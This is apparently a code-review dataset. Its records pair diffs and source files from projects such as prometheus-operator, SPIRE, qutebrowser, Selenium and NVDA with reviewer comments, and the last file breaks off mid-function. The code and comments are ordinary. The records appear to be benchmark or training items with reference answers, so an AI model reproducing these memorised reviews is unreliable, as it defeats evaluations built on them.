a.Spec.ConfigMaps { volumes = append(volumes, v1.Volume{ Name: k8sutil.SanitizeVolumeName("configmap-" + c), VolumeSource: v1.VolumeSource{ ConfigMap: &v1.ConfigMapVolumeSource{ LocalObjectReference: v1.LocalObjectReference{ Name: c, }, }, }, }) mountPath := configmapsDir + c mount := v1.VolumeMount{ Name: k8sutil.SanitizeVolumeName("configmap-" + c), ReadOnly: true, MountPath: mountPath, } amVolumeMounts = append(amVolumeMounts, mount) configReloaderVolumeMounts = append(configReloaderVolumeMounts, mount) reloadWatchDirs = append(reloadWatchDirs, mountPath) } amVolumeMounts = append(amVolumeMounts, a.Spec.VolumeMounts...) resources := v1.ResourceRequirements{Limits: v1.ResourceList{}} if config.ConfigReloaderCPU != "0" { resources.Limits[v1.ResourceCPU] = resource.MustParse(config.ConfigReloaderCPU) } if config.ConfigReloaderMemory != "0" { resources.Limits[v1.ResourceMemory] = resource.MustParse(config.ConfigReloaderMemory) } terminationGracePeriod := int64(120) finalSelectorLabels := config.Labels.Merge(podSelectorLabels) finalLabels := config.Labels.Merge(podLabels) configReloaderArgs := []string{ fmt.Sprintf("-webhook-url=%s", localReloadURL), } for _, reloadWatchDir := range reloadWatchDirs { configReloaderArgs = append(configReloaderArgs, fmt.Sprintf("-volume-dir=%s", reloadWatchDir)) } defaultContainers := []v1.Container{ { Args: amArgs, Name: "alertmanager", Image: amImagePath, Ports: ports, VolumeMounts: amVolumeMounts, LivenessProbe: livenessProbe, ReadinessProbe: readinessProbe, Resources: a.Spec.Resources, Env: []v1.EnvVar{ { // Necessary for '--cluster.listen-address' flag Name: "POD_IP", ValueFrom: &v1.EnvVarSource{ FieldRef: &v1.ObjectFieldSelector{ FieldPath: "status.podIP", }, }, }, }, TerminationMessagePolicy: v1.TerminationMessageFallbackToLogsOnError, }, { Name: "config-reloader", Image: config.ConfigReloaderImage, Args: configReloaderArgs, VolumeMounts: configReloaderVolumeMounts, Resources: resources, TerminationMessagePolicy: v1.TerminationMessageFallbackToLogsOnError, }, } containers, err := k8sutil.MergePatchContainers(defaultContainers, a.Spec.Containers) if err != nil { return nil, errors.Wrap(err, "failed to merge containers spec") } // PodManagementPolicy is set to Parallel to mitigate issues in kubernetes: https://github.com/kubernetes/kubernetes/issues/60164 // This is also mentioned as one of limitations of StatefulSets: https://kubernetes.io/docs/concepts/workloads/controllers/statefulset/#limitations return &appsv1.StatefulSetSpec{ ServiceName: governingServiceName, Replicas: a.Spec.Replicas, PodManagementPolicy: appsv1.ParallelPodManagement, UpdateStrategy: appsv1.StatefulSetUpdateStrategy{ Type: appsv1.RollingUpdateStatefulSetStrategyType, }, Selector: &metav1.LabelSelector{ MatchLabels: finalSelectorLabels, }, Template: v1.PodTemplateSpec{ ObjectMeta: metav1.ObjectMeta{ Labels: finalLabels, Annotations: podAnnotations, }, Spec: v1.PodSpec{ NodeSelector: a.Spec.NodeSelector, PriorityClassName: a.Spec.PriorityClassName, TerminationGracePeriodSeconds: &terminationGracePeriod, InitContainers: a.Spec.InitContainers, Containers: containers, Volumes: volumes, ServiceAccountName: a.Spec.ServiceAccountName, SecurityContext: a.Spec.SecurityContext, Tolerations: a.Spec.Tolerations, Affinity: a.Spec.Affinity, }, }, }, nil } func configSecretName(name string) string { return prefixedName(name) } func volumeName(name string) string { return fmt.Sprintf("%s-db", prefixedName(name)) } func prefixedName(name string) string { return fmt.Sprintf("alertmanager-%s", name) } func subPathForStorage(s *monitoringv1.StorageSpec) string { if s == nil { return "" } if s.DisableMountSubPath { return "" } return "alertmanager-db" } func filter(strings []string, f func(string) bool) []string { filteredStrings := make([]string, 0) for _, s := range strings { if f(s) { filteredStrings = append(filteredStrings, s) } } return filteredStrings }
1
14,927
This service is global per namespace, not per Alertmanager/Prometheus/ThanosRuler instance. So this approach won't work. But maybe I missing out something, can you describe your use case here?
prometheus-operator-prometheus-operator
go
@@ -32,6 +32,7 @@ type AttestedNode struct { ExpiresAt time.Time `gorm:"index"` NewSerialNumber string NewExpiresAt *time.Time + CanReattest bool `gorm:"default:false"` Selectors []*NodeSelector }
1
package sqlstore import ( "time" ) // Model is used as a base for other models. Similar to gorm.Model without `DeletedAt`. // We don't want soft-delete support. type Model struct { ID uint `gorm:"primary_key"` CreatedAt time.Time UpdatedAt time.Time } // Bundle holds a trust bundle. type Bundle struct { Model TrustDomain string `gorm:"not null;unique_index"` Data []byte `gorm:"size:16777215"` // make MySQL to use MEDIUMBLOB (max 16MB) - doesn't affect PostgreSQL/SQLite FederatedEntries []RegisteredEntry `gorm:"many2many:federated_registration_entries;"` } // AttestedNode holds an attested node (agent) type AttestedNode struct { Model SpiffeID string `gorm:"unique_index"` DataType string SerialNumber string ExpiresAt time.Time `gorm:"index"` NewSerialNumber string NewExpiresAt *time.Time Selectors []*NodeSelector } // TableName gets table name of AttestedNode func (AttestedNode) TableName() string { return "attested_node_entries" } type V3AttestedNode struct { Model SpiffeID string `gorm:"unique_index"` DataType string SerialNumber string ExpiresAt time.Time } func (V3AttestedNode) TableName() string { return "attested_node_entries" } // NodeSelector holds a node selector by spiffe ID type NodeSelector struct { Model SpiffeID string `gorm:"unique_index:idx_node_resolver_map"` Type string `gorm:"unique_index:idx_node_resolver_map"` Value string `gorm:"unique_index:idx_node_resolver_map"` } // TableName gets table name of NodeSelector func (NodeSelector) TableName() string { return "node_resolver_map_entries" } // RegisteredEntry holds a registered entity entry type RegisteredEntry struct { Model EntryID string `gorm:"unique_index"` SpiffeID string `gorm:"index"` ParentID string `gorm:"index"` // TTL of identities derived from this entry TTL int32 Selectors []Selector FederatesWith []Bundle `gorm:"many2many:federated_registration_entries;"` Admin bool Downstream bool // (optional) expiry of this entry Expiry int64 `gorm:"index"` // (optional) DNS entries DNSList []DNSName // RevisionNumber is a counter that is incremented when the entry is // updated. RevisionNumber int64 // StoreSvid determines if the issued SVID is exportable to a store StoreSvid bool } // JoinToken holds a join token type JoinToken struct { Model Token string `gorm:"unique_index"` Expiry int64 } type Selector struct { Model RegisteredEntryID uint `gorm:"unique_index:idx_selector_entry"` Type string `gorm:"unique_index:idx_selector_entry;index:idx_selectors_type_value"` Value string `gorm:"unique_index:idx_selector_entry;index:idx_selectors_type_value"` } // DNSName holds a DNS for a registration entry type DNSName struct { Model RegisteredEntryID uint `gorm:"unique_index:idx_dns_entry"` Value string `gorm:"unique_index:idx_dns_entry"` } // TableName gets table name for DNS entries func (DNSName) TableName() string { return "dns_names" } // FederatedTrustDomain holds federated trust domains. // It has the information needed to get updated bundles of the // federated trust domain from a SPIFFE bundle endpoint server. type FederatedTrustDomain struct { Model // TrustDomain is the trust domain name (e.g., "example.org") to federate with. TrustDomain string `gorm:"not null;unique_index"` // BundleEndpointURL is the URL of the SPIFFE bundle endpoint that provides the trust // bundle to federate with. BundleEndpointURL string // BundleEndpointProfile is the endpoint profile type. BundleEndpointProfile string // EndpointSPIFFEID specifies the expected SPIFFE ID of the // SPIFFE bundle endpoint server when BundleEndpointProfile // is "https_spiffe" EndpointSPIFFEID string // Implicit indicates wether the trust domain automatically federates with // all registration entries by default or not. Implicit bool } // TableName gets table name of FederatedTrustDomain func (FederatedTrustDomain) TableName() string { return "federated_trust_domains" } // Migration holds database schema version number, and // the SPIRE Code version number type Migration struct { Model // Database version Version int // SPIRE Code versioning CodeVersion string }
1
18,246
Do we need this default? Since we aren't using a sql.NullBool or *bool, an unset column will be interpreted as `false` already... We don't set a default on our other bool fields (e.g. entry admin and downstream columns).
spiffe-spire
go
@@ -39,6 +39,18 @@ module ExportsHelper "<strong>#{prefix}</strong> #{attribution.join(', ')}" end + def download_plan_page_title(plan, phase, hash) + # If there is more than one phase show the plan title and phase title + return hash[:phases].many? ? "#{plan.title} - #{phase[:title]}" : plan.title + end + + def display_section?(customization, section, show_custom_sections) + display = !customization + display ||= customization && !section[:modifiable] + display ||= customization && section[:modifiable] && show_custom_sections + return display + end + private def get_margin_value_for_side(side)
1
# frozen_string_literal: true module ExportsHelper PAGE_MARGINS = { top: "5", bottom: "10", left: "12", right: "12", } def font_face @formatting[:font_face].presence || "Arial, Helvetica, Sans-Serif" end def font_size @formatting[:font_size].presence || "12" end def margin_top get_margin_value_for_side(:top) end def margin_bottom get_margin_value_for_side(:bottom) end def margin_left get_margin_value_for_side(:left) end def margin_right get_margin_value_for_side(:right) end def plan_attribution(attribution) attribution = Array(attribution) prefix = attribution.many? ? _("Creators:") : _("Creator:") "<strong>#{prefix}</strong> #{attribution.join(', ')}" end private def get_margin_value_for_side(side) side = side.to_sym if @formatting.dig(:margin, side).is_a?(Integer) @formatting[:margin][side] * 4 else @formatting.dig(:margin, side).presence || PAGE_MARGINS[side] end end end
1
18,314
thanks for moving these over. makes more sense for them to be in the exports_helper
DMPRoadmap-roadmap
rb
@@ -29,8 +29,9 @@ from qutebrowser.utils import message from qutebrowser.config import config from qutebrowser.keyinput import keyparser from qutebrowser.utils import usertypes, log, objreg, utils +from qutebrowser.config.parsers import keyconf - + STARTCHARS = ":/?" LastPress = usertypes.enum('LastPress', ['none', 'filtertext', 'keystring'])
1
# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et: # Copyright 2014-2016 Florian Bruhin (The Compiler) <[email protected]> # # This file is part of qutebrowser. # # qutebrowser is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # qutebrowser is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with qutebrowser. If not, see <http://www.gnu.org/licenses/>. """KeyChainParser for "hint" and "normal" modes. Module attributes: STARTCHARS: Possible chars for starting a commandline input. """ from PyQt5.QtCore import pyqtSlot, Qt from qutebrowser.utils import message from qutebrowser.config import config from qutebrowser.keyinput import keyparser from qutebrowser.utils import usertypes, log, objreg, utils STARTCHARS = ":/?" LastPress = usertypes.enum('LastPress', ['none', 'filtertext', 'keystring']) class NormalKeyParser(keyparser.CommandKeyParser): """KeyParser for normal mode with added STARTCHARS detection and more. Attributes: _partial_timer: Timer to clear partial keypresses. """ def __init__(self, win_id, parent=None): super().__init__(win_id, parent, supports_count=True, supports_chains=True) self.read_config('normal') self._partial_timer = usertypes.Timer(self, 'partial-match') self._partial_timer.setSingleShot(True) self._inhibited = False self._inhibited_timer = usertypes.Timer(self, 'normal-inhibited') self._inhibited_timer.setSingleShot(True) def __repr__(self): return utils.get_repr(self) def _handle_single_key(self, e): """Override _handle_single_key to abort if the key is a startchar. Args: e: the KeyPressEvent from Qt. Return: A self.Match member. """ txt = e.text().strip() if self._inhibited: self._debug_log("Ignoring key '{}', because the normal mode is " "currently inhibited.".format(txt)) return self.Match.none if not self._keystring and any(txt == c for c in STARTCHARS): message.set_cmd_text(self._win_id, txt) return self.Match.definitive match = super()._handle_single_key(e) if match == self.Match.partial: timeout = config.get('input', 'partial-timeout') if timeout != 0: self._partial_timer.setInterval(timeout) self._partial_timer.timeout.connect(self._clear_partial_match) self._partial_timer.start() return match def set_inhibited_timeout(self, timeout): if timeout != 0: self._debug_log("Inhibiting the normal mode for {}ms.".format( timeout)) self._inhibited = True self._inhibited_timer.setInterval(timeout) self._inhibited_timer.timeout.connect(self._clear_inhibited) self._inhibited_timer.start() @pyqtSlot() def _clear_partial_match(self): """Clear a partial keystring after a timeout.""" self._debug_log("Clearing partial keystring {}".format( self._keystring)) self._keystring = '' self.keystring_updated.emit(self._keystring) @pyqtSlot() def _clear_inhibited(self): """Reset inhibition state after a timeout.""" self._debug_log("Releasing inhibition state of normal mode.") self._inhibited = False @pyqtSlot() def _stop_timers(self): super()._stop_timers() self._partial_timer.stop() try: self._partial_timer.timeout.disconnect(self._clear_partial_match) except TypeError: # no connections pass self._inhibited_timer.stop() try: self._inhibited_timer.timeout.disconnect(self._clear_inhibited) except TypeError: # no connections pass class PromptKeyParser(keyparser.CommandKeyParser): """KeyParser for yes/no prompts.""" def __init__(self, win_id, parent=None): super().__init__(win_id, parent, supports_count=False, supports_chains=True) # We don't want an extra section for this in the config, so we just # abuse the prompt section. self.read_config('prompt') def __repr__(self): return utils.get_repr(self) class HintKeyParser(keyparser.CommandKeyParser): """KeyChainParser for hints. Attributes: _filtertext: The text to filter with. _last_press: The nature of the last keypress, a LastPress member. """ def __init__(self, win_id, parent=None): super().__init__(win_id, parent, supports_count=False, supports_chains=True) self._filtertext = '' self._last_press = LastPress.none self.read_config('hint') self.keystring_updated.connect(self.on_keystring_updated) def _handle_special_key(self, e): """Override _handle_special_key to handle string filtering. Return True if the keypress has been handled, and False if not. Args: e: the KeyPressEvent from Qt. Return: True if event has been handled, False otherwise. """ log.keyboard.debug("Got special key 0x{:x} text {}".format( e.key(), e.text())) hintmanager = objreg.get('hintmanager', scope='tab', window=self._win_id, tab='current') if e.key() == Qt.Key_Backspace: log.keyboard.debug("Got backspace, mode {}, filtertext '{}', " "keystring '{}'".format(self._last_press, self._filtertext, self._keystring)) if self._last_press == LastPress.filtertext and self._filtertext: self._filtertext = self._filtertext[:-1] hintmanager.filter_hints(self._filtertext) return True elif self._last_press == LastPress.keystring and self._keystring: self._keystring = self._keystring[:-1] self.keystring_updated.emit(self._keystring) if not self._keystring and self._filtertext: # Switch back to hint filtering mode (this can happen only # in numeric mode after the number has been deleted). hintmanager.filter_hints(self._filtertext) self._last_press = LastPress.filtertext return True else: return super()._handle_special_key(e) elif hintmanager.current_mode() != 'number': return super()._handle_special_key(e) elif not e.text(): return super()._handle_special_key(e) else: self._filtertext += e.text() hintmanager.filter_hints(self._filtertext) self._last_press = LastPress.filtertext return True def handle(self, e): """Handle a new keypress and call the respective handlers. Args: e: the KeyPressEvent from Qt Returns: True if the match has been handled, False otherwise. """ match = self._handle_single_key(e) if match == self.Match.partial: self.keystring_updated.emit(self._keystring) self._last_press = LastPress.keystring return True elif match == self.Match.definitive: self._last_press = LastPress.none return True elif match == self.Match.other: pass elif match == self.Match.none: # We couldn't find a keychain so we check if it's a special key. return self._handle_special_key(e) else: raise ValueError("Got invalid match type {}!".format(match)) def execute(self, cmdstr, keytype, count=None): """Handle a completed keychain.""" if not isinstance(keytype, self.Type): raise TypeError("Type {} is no Type member!".format(keytype)) if keytype == self.Type.chain: hintmanager = objreg.get('hintmanager', scope='tab', window=self._win_id, tab='current') hintmanager.fire(cmdstr) else: # execute as command super().execute(cmdstr, keytype, count) def update_bindings(self, strings, preserve_filter=False): """Update bindings when the hint strings changed. Args: strings: A list of hint strings. preserve_filter: Whether to keep the current value of `self._filtertext`. """ self.bindings = {s: s for s in strings} if not preserve_filter: self._filtertext = '' @pyqtSlot(str) def on_keystring_updated(self, keystr): """Update hintmanager when the keystring was updated.""" hintmanager = objreg.get('hintmanager', scope='tab', window=self._win_id, tab='current') hintmanager.handle_partial_key(keystr) class CaretKeyParser(keyparser.CommandKeyParser): """KeyParser for caret mode.""" passthrough = True def __init__(self, win_id, parent=None): super().__init__(win_id, parent, supports_count=True, supports_chains=True) self.read_config('caret') class MarkKeyParser(keyparser.BaseKeyParser): """KeyParser for set_mark and jump_mark mode. Attributes: _mode: Either KeyMode.set_mark or KeyMode.jump_mark. """ def __init__(self, win_id, mode, parent=None): super().__init__(win_id, parent, supports_count=False, supports_chains=False) self._mode = mode def handle(self, e): """Override handle to always match the next key and create a mark. Args: e: the KeyPressEvent from Qt. Return: True if event has been handled, False otherwise. """ if utils.keyevent_to_string(e) is None: # this is a modifier key, let it pass and keep going return False key = e.text() tabbed_browser = objreg.get('tabbed-browser', scope='window', window=self._win_id) if self._mode == usertypes.KeyMode.set_mark: tabbed_browser.set_mark(key) elif self._mode == usertypes.KeyMode.jump_mark: tabbed_browser.jump_mark(key) else: raise ValueError("{} is not a valid mark mode".format(self._mode)) self.request_leave.emit(self._mode, "valid mark key") return True @pyqtSlot(str) def on_keyconfig_changed(self, mode): """MarkKeyParser has no config section (no bindable keys).""" pass def execute(self, cmdstr, _keytype, count=None): """Should never be called on MarkKeyParser.""" assert False
1
16,083
That import now isn't needed anymore
qutebrowser-qutebrowser
py
@@ -237,6 +237,8 @@ class WebDriver(RemoteWebDriver): Returns identifier of installed addon. This identifier can later be used to uninstall addon. + :param path: Full path to the addon that will be installed. + :Usage: driver.install_addon('firebug.xpi') """
1
# Licensed to the Software Freedom Conservancy (SFC) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The SFC licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. try: import http.client as http_client except ImportError: import httplib as http_client try: basestring except NameError: # Python 3.x basestring = str import shutil import socket import sys from contextlib import contextmanager from selenium.webdriver.common.desired_capabilities import DesiredCapabilities from selenium.webdriver.remote.webdriver import WebDriver as RemoteWebDriver from .extension_connection import ExtensionConnection from .firefox_binary import FirefoxBinary from .firefox_profile import FirefoxProfile from .options import Options from .remote_connection import FirefoxRemoteConnection from .service import Service from .webelement import FirefoxWebElement class WebDriver(RemoteWebDriver): # There is no native event support on Mac NATIVE_EVENTS_ALLOWED = sys.platform != "darwin" CONTEXT_CHROME = "chrome" CONTEXT_CONTENT = "content" _web_element_cls = FirefoxWebElement def __init__(self, firefox_profile=None, firefox_binary=None, timeout=30, capabilities=None, proxy=None, executable_path="geckodriver", firefox_options=None, log_path="geckodriver.log"): """Starts a new local session of Firefox. Based on the combination and specificity of the various keyword arguments, a capabilities dictionary will be constructed that is passed to the remote end. The keyword arguments given to this constructor are helpers to more easily allow Firefox WebDriver sessions to be customised with different options. They are mapped on to a capabilities dictionary that is passed on to the remote end. As some of the options, such as `firefox_profile` and `firefox_options.profile` are mutually exclusive, precedence is given from how specific the setting is. `capabilities` is the least specific keyword argument, followed by `firefox_options`, followed by `firefox_binary` and `firefox_profile`. In practice this means that if `firefox_profile` and `firefox_options.profile` are both set, the selected profile instance will always come from the most specific variable. In this case that would be `firefox_profile`. This will result in `firefox_options.profile` to be ignored because it is considered a less specific setting than the top-level `firefox_profile` keyword argument. Similarily, if you had specified a `capabilities["firefoxOptions"]["profile"]` Base64 string, this would rank below `firefox_options.profile`. :param firefox_profile: Instance of ``FirefoxProfile`` object or a string. If undefined, a fresh profile will be created in a temporary location on the system. :param firefox_binary: Instance of ``FirefoxBinary`` or full path to the Firefox binary. If undefined, the system default Firefox installation will be used. :param timeout: Time to wait for Firefox to launch when using the extension connection. :param capabilities: Dictionary of desired capabilities. :param proxy: The proxy settings to us when communicating with Firefox via the extension connection. :param executable_path: Full path to override which geckodriver binary to use for Firefox 47.0.1 and greater, which defaults to picking up the binary from the system path. :param firefox_options: Instance of ``options.Options``. :param log_path: Where to log information from the driver. """ self.binary = None self.profile = None self.service = None if capabilities is None: capabilities = DesiredCapabilities.FIREFOX.copy() if firefox_options is None: firefox_options = Options() capabilities = dict(capabilities) if capabilities.get("binary"): self.binary = capabilities["binary"] # firefox_options overrides capabilities if firefox_options is not None: if firefox_options.binary is not None: self.binary = firefox_options.binary if firefox_options.profile is not None: self.profile = firefox_options.profile # firefox_binary and firefox_profile # override firefox_options if firefox_binary is not None: if isinstance(firefox_binary, basestring): firefox_binary = FirefoxBinary(firefox_binary) self.binary = firefox_binary firefox_options.binary = firefox_binary if firefox_profile is not None: if isinstance(firefox_profile, basestring): firefox_profile = FirefoxProfile(firefox_profile) self.profile = firefox_profile firefox_options.profile = firefox_profile # W3C remote # TODO(ato): Perform conformance negotiation if capabilities.get("marionette"): capabilities.pop("marionette") self.service = Service(executable_path, log_path=log_path) self.service.start() capabilities.update(firefox_options.to_capabilities()) executor = FirefoxRemoteConnection( remote_server_addr=self.service.service_url) RemoteWebDriver.__init__( self, command_executor=executor, desired_capabilities=capabilities, keep_alive=True) # Selenium remote else: if self.binary is None: self.binary = FirefoxBinary() if self.profile is None: self.profile = FirefoxProfile() # disable native events if globally disabled self.profile.native_events_enabled = ( self.NATIVE_EVENTS_ALLOWED and self.profile.native_events_enabled) if proxy is not None: proxy.add_to_capabilities(capabilities) executor = ExtensionConnection("127.0.0.1", self.profile, self.binary, timeout) RemoteWebDriver.__init__( self, command_executor=executor, desired_capabilities=capabilities, keep_alive=True) self._is_remote = False def quit(self): """Quits the driver and close every associated window.""" try: RemoteWebDriver.quit(self) except (http_client.BadStatusLine, socket.error): # Happens if Firefox shutsdown before we've read the response from # the socket. pass if self.w3c: self.service.stop() else: self.binary.kill() if self.profile is not None: try: shutil.rmtree(self.profile.path) if self.profile.tempfolder is not None: shutil.rmtree(self.profile.tempfolder) except Exception as e: print(str(e)) @property def firefox_profile(self): return self.profile # Extension commands: def set_context(self, context): self.execute("SET_CONTEXT", {"context": context}) @contextmanager def context(self, context): """Sets the context that Selenium commands are running in using a `with` statement. The state of the context on the server is saved before entering the block, and restored upon exiting it. :param context: Context, may be one of the class properties `CONTEXT_CHROME` or `CONTEXT_CONTENT`. Usage example:: with selenium.context(selenium.CONTEXT_CHROME): # chrome scope ... do stuff ... """ initial_context = self.execute('GET_CONTEXT').pop('value') self.set_context(context) try: yield finally: self.set_context(initial_context) def install_addon(self, path, temporary=None): """ Installs Firefox addon. Returns identifier of installed addon. This identifier can later be used to uninstall addon. :Usage: driver.install_addon('firebug.xpi') """ payload = {"path": path} if temporary is not None: payload["temporary"] = temporary return self.execute("INSTALL_ADDON", payload)["value"] def uninstall_addon(self, identifier): """ Uninstalls Firefox addon using its identifier. :Usage: driver.uninstall_addon('[email protected]') """ self.execute("UNINSTALL_ADDON", {"id": identifier})
1
14,956
Can you update the `Usage` to be an absolute path as well? Something like `/path/to/firebug.xpi`
SeleniumHQ-selenium
py
@@ -2,17 +2,13 @@ // The .NET Foundation licenses this file to you under the MS-PL license. // See the LICENSE file in the project root for more information. - -using MvvmCross.Plugins; - namespace MvvmCross.Plugin.Accelerometer.Platform.Uap { - public class Plugin - : IMvxPlugin + public class Plugin : IMvxPlugin { public void Load() { - Mvx.RegisterSingleton<IMvxAccelerometer>(new MvxWindowsCommonAccelerometer()); + Mvx.RegisterSingleton<IMvxAccelerometer>(new MvxWindowsAccelerometer()); } } }
1
// Licensed to the .NET Foundation under one or more agreements. // The .NET Foundation licenses this file to you under the MS-PL license. // See the LICENSE file in the project root for more information. using MvvmCross.Plugins; namespace MvvmCross.Plugin.Accelerometer.Platform.Uap { public class Plugin : IMvxPlugin { public void Load() { Mvx.RegisterSingleton<IMvxAccelerometer>(new MvxWindowsCommonAccelerometer()); } } }
1
13,752
This class is missing the `MvxPlugin` attribute
MvvmCross-MvvmCross
.cs
@@ -596,6 +596,8 @@ def initialize(): if mainFrame: raise RuntimeError("GUI already initialized") mainFrame = MainFrame() + wxLang = core.getWxLang(languageHandler.getLanguage()) + mainFrame.SetLayoutDirection(wxLang.LayoutDirection) wx.GetApp().SetTopWindow(mainFrame) # In wxPython >= 4.1, # wx.CallAfter no longer executes callbacks while NVDA's main thread is within apopup menu or message box.
1
# -*- coding: UTF-8 -*- # A part of NonVisual Desktop Access (NVDA) # Copyright (C) 2006-2020 NV Access Limited, Peter Vágner, Aleksey Sadovoy, Mesar Hameed, Joseph Lee, # Thomas Stivers, Babbage B.V. # This file is covered by the GNU General Public License. # See the file COPYING for more details. from .contextHelp import ( # several other submodules depend on ContextHelpMixin # ensure early that it can be imported successfully. ContextHelpMixin as _ContextHelpMixin, # don't expose from gui, import submodule directly. ) import time import os import sys import threading import codecs import ctypes import weakref import wx import wx.adv import globalVars import tones import ui from logHandler import log import config import versionInfo import addonAPIVersion import speech import queueHandler import core from . import guiHelper from .settingsDialogs import * from .inputGestures import InputGesturesDialog import speechDictHandler import languageHandler import keyboardHandler from . import logViewer import speechViewer import winUser import api from . import guiHelper import winVersion try: import updateCheck except RuntimeError: updateCheck = None ### Constants NVDA_PATH = globalVars.appDir ICON_PATH=os.path.join(NVDA_PATH, "images", "nvda.ico") DONATE_URL = "http://www.nvaccess.org/donate/" ### Globals mainFrame = None isInMessageBox = False def getDocFilePath(fileName, localized=True): if not getDocFilePath.rootPath: if hasattr(sys, "frozen"): getDocFilePath.rootPath = os.path.join(NVDA_PATH, "documentation") else: getDocFilePath.rootPath = os.path.join(NVDA_PATH, "..", "user_docs") if localized: lang = languageHandler.getLanguage() tryLangs = [lang] if "_" in lang: # This locale has a sub-locale, but documentation might not exist for the sub-locale, so try stripping it. tryLangs.append(lang.split("_")[0]) # If all else fails, use English. tryLangs.append("en") fileName, fileExt = os.path.splitext(fileName) for tryLang in tryLangs: tryDir = os.path.join(getDocFilePath.rootPath, tryLang) if not os.path.isdir(tryDir): continue # Some out of date translations might include .txt files which are now .html files in newer translations. # Therefore, ignore the extension and try both .html and .txt. for tryExt in ("html", "txt"): tryPath = os.path.join(tryDir, "%s.%s" % (fileName, tryExt)) if os.path.isfile(tryPath): return tryPath return None else: # Not localized. if not hasattr(sys, "frozen") and fileName in ("copying.txt", "contributors.txt"): # If running from source, these two files are in the root dir. return os.path.join(NVDA_PATH, "..", fileName) else: return os.path.join(getDocFilePath.rootPath, fileName) getDocFilePath.rootPath = None class MainFrame(wx.Frame): def __init__(self): style = wx.DEFAULT_FRAME_STYLE ^ wx.MAXIMIZE_BOX ^ wx.MINIMIZE_BOX | wx.FRAME_NO_TASKBAR super(MainFrame, self).__init__(None, wx.ID_ANY, versionInfo.name, size=(1,1), style=style) self.Bind(wx.EVT_CLOSE, self.onExitCommand) self.sysTrayIcon = SysTrayIcon(self) #: The focus before the last popup or C{None} if unknown. #: This is only valid before L{prePopup} is called, #: so it should be used as early as possible in any popup that needs it. #: @type: L{NVDAObject} self.prevFocus = None #: The focus ancestors before the last popup or C{None} if unknown. #: @type: list of L{NVDAObject} self.prevFocusAncestors = None # If NVDA has the uiAccess privilege, it can always set the foreground window. import systemUtils if not systemUtils.hasUiAccess(): # This makes Windows return to the previous foreground window and also seems to allow NVDA to be brought to the foreground. self.Show() self.Hide() if winUser.isWindowVisible(self.Handle): # HACK: Work around a wx bug where Hide() doesn't actually hide the window, # but IsShown() returns False and Hide() again doesn't fix it. # This seems to happen if the call takes too long. self.Show() self.Hide() def Destroy(self): self.sysTrayIcon.Destroy() super(MainFrame, self).Destroy() def prePopup(self): """Prepare for a popup. This should be called before any dialog or menu which should pop up for the user. L{postPopup} should be called after the dialog or menu has been shown. @postcondition: A dialog or menu may be shown. """ nvdaPid = os.getpid() focus = api.getFocusObject() if focus.processID != nvdaPid: self.prevFocus = focus self.prevFocusAncestors = api.getFocusAncestors() if winUser.getWindowThreadProcessID(winUser.getForegroundWindow())[0] != nvdaPid: # This process is not the foreground process, so bring it to the foreground. self.Raise() def postPopup(self): """Clean up after a popup dialog or menu. This should be called after a dialog or menu was popped up for the user. """ self.prevFocus = None self.prevFocusAncestors = None if not winUser.isWindowVisible(winUser.getForegroundWindow()): # The current foreground window is invisible, so we want to return to the previous foreground window. # Showing and hiding our main window seems to achieve this. self.Show() self.Hide() def showGui(self): # The menu pops up at the location of the mouse, which means it pops up at an unpredictable location. # Therefore, move the mouse to the center of the screen so that the menu will always pop up there. location = api.getDesktopObject().location winUser.setCursorPos(*location.center) self.evaluateUpdatePendingUpdateMenuItemCommand() self.sysTrayIcon.onActivate(None) def onRevertToSavedConfigurationCommand(self,evt): queueHandler.queueFunction(queueHandler.eventQueue,core.resetConfiguration) # Translators: Reported when last saved configuration has been applied by using revert to saved configuration option in NVDA menu. queueHandler.queueFunction(queueHandler.eventQueue,ui.message,_("Configuration applied")) def onRevertToDefaultConfigurationCommand(self,evt): queueHandler.queueFunction(queueHandler.eventQueue,core.resetConfiguration,factoryDefaults=True) # Translators: Reported when configuration has been restored to defaults by using restore configuration to factory defaults item in NVDA menu. queueHandler.queueFunction(queueHandler.eventQueue,ui.message,_("Configuration restored to factory defaults")) def onSaveConfigurationCommand(self,evt): if globalVars.appArgs.secure: # Translators: Reported when current configuration cannot be saved while NVDA is running in secure mode such as in Windows login screen. queueHandler.queueFunction(queueHandler.eventQueue,ui.message,_("Cannot save configuration - NVDA in secure mode")) return try: config.conf.save() # Translators: Reported when current configuration has been saved. queueHandler.queueFunction(queueHandler.eventQueue,ui.message,_("Configuration saved")) except: # Translators: Message shown when current configuration cannot be saved such as when running NVDA from a CD. messageBox(_("Could not save configuration - probably read only file system"),_("Error"),wx.OK | wx.ICON_ERROR) def _popupSettingsDialog(self, dialog, *args, **kwargs): if isInMessageBox: return self.prePopup() try: dialog(self, *args, **kwargs).Show() except SettingsDialog.MultiInstanceError: # Translators: Message shown when attempting to open another NVDA settings dialog when one is already open # (example: when trying to open keyboard settings when general settings dialog is open). messageBox(_("An NVDA settings dialog is already open. Please close it first."),_("Error"),style=wx.OK | wx.ICON_ERROR) except MultiCategorySettingsDialog.CategoryUnavailableError: # Translators: Message shown when trying to open an unavailable category of a multi category settings dialog # (example: when trying to open touch interaction settings on an unsupported system). messageBox(_("The settings panel you tried to open is unavailable on this system."),_("Error"),style=wx.OK | wx.ICON_ERROR) self.postPopup() def onDefaultDictionaryCommand(self,evt): # Translators: Title for default speech dictionary dialog. self._popupSettingsDialog(DictionaryDialog,_("Default dictionary"),speechDictHandler.dictionaries["default"]) def onVoiceDictionaryCommand(self,evt): # Translators: Title for voice dictionary for the current voice such as current eSpeak variant. self._popupSettingsDialog(DictionaryDialog,_("Voice dictionary (%s)")%speechDictHandler.dictionaries["voice"].fileName,speechDictHandler.dictionaries["voice"]) def onTemporaryDictionaryCommand(self,evt): # Translators: Title for 